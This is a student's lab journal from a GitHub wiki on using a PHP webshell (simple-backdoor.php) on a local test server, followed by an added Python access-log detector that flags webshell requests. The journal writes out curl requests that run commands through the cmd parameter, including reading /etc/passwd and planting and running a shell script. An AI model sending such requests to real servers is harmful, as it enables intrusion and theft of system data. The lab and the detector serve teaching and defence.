Assignment 7.1 - Zacham17/my-tech-journal GitHub Wiki
Assignment 7.1: Webshells
Preparation
- A script to exploit a backdoor is located at /usr/share/webshells/php/simple-backdoor.php
- The script allows for command execution through a URL
- I made a directory called "webshell" and in it, I put an index.html file and I copied the simple-backdoor.php file into the directory
- I started running a PHP Web Server using the command
php -S 127.0.0.1:8090 -t
- This command runs a web server that listens on port 8090
Exploiting the PHP Web Server
- Requesting the simple-backdoor.php file in a URL executes commands on the PHP server.
- The syntax I used in the URL to execute commands was
http://127.0.0.1:8090/simple-backdoor.php?cmd=COMMAND_HERE
- For example: I used the URL
http://127.0.0.1:8090/simple-backdoor.php?cmd=cat+/etc/passwd
to display the contents of the /etc/passwd file
- NOTE: The "+" symbol replaces spaces
- A great website to convert text to URL syntax is W3Schools
Using Curl to exploit PHP
- The curl command can be used to display the output of commands executed through the URL
- An example of this is
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=ip+a
- This command will show the IP information of the host
- The command
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=whoami
can be used to output who is currently logged in to the server
Creating a Script on the PHP Server Remotely
- The following commands, executed in order, can be used to create a script on the PHP Server through commands embedded in the URLs
- 1:
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+%27%23%21%2Fbin%2Fbash%27+%3E+webshellScript.sh
- 2:
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+%27id%27+%3E%3E+webshellScript.sh
- Those commands create a simple shell script that runs the "id" command
Executing the Script
- I ran the script I created using the command
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=sh+webshellScript.sh
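Detection view of the requests above, as an added example that is not part of the original journal: it decodes the query string of each access-log line (undoing both the "+" and the %XX encoding) and flags values that look like shell commands. The log lines are constructed in an assumed combined-log layout, and the parameter watch list and two-indicator threshold are hypothetical choices.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (combined-log layout is an assumption); the URLs are the page's own.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 120
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=ip+cameras HTTP/1.1" 200 640
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /simple-backdoor.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1800
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /simple-backdoor.php?cmd=whoami HTTP/1.1" 200 40
127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /simple-backdoor.php?cmd=echo+%27%23%21%2Fbin%2Fbash%27+%3E+webshellScript.sh HTTP/1.1" 200 20
127.0.0.1 - - [01/Jan/2024:10:00:15 +0000] "GET /simple-backdoor.php?cmd=sh+webshellScript.sh HTTP/1.1" 200 60
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SUSPECT_PARAMS = {"cmd", "exec", "command", "c"}  # hypothetical watch list
SHELL_WORDS = re.compile(r"^\s*(cat|id|whoami|uname|ip|ifconfig|sh|bash|echo|ls|wget|curl)\b")
SHELL_META = re.compile(r"[;|&`<>]|\$\(")
SENSITIVE = re.compile(r"/etc/(passwd|shadow)")

def find_webshell_requests(log_text):
    """Return (path, param, decoded_value, indicators) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl undoes both encodings the page uses: '+' -> space, %XX -> character
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            hits = []
            if name.lower() in SUSPECT_PARAMS:
                hits.append("param-name")
            if SHELL_WORDS.search(value):
                hits.append("shell-command")
            if SHELL_META.search(value):
                hits.append("shell-metachar")
            if SENSITIVE.search(value):
                hits.append("sensitive-path")
            if len(hits) >= 2:  # one weak signal alone (e.g. q=ip+cameras) is not enough
                findings.append((url.path, name, value, hits))
    return findings

if __name__ == "__main__":
    for path, name, value, hits in find_webshell_requests(SAMPLE_LOG):
        print(f"{path} {name}={value!r} {hits}")
```

Matching on the decoded value matters here: the script-creation request only shows its redirection character after %3E is decoded.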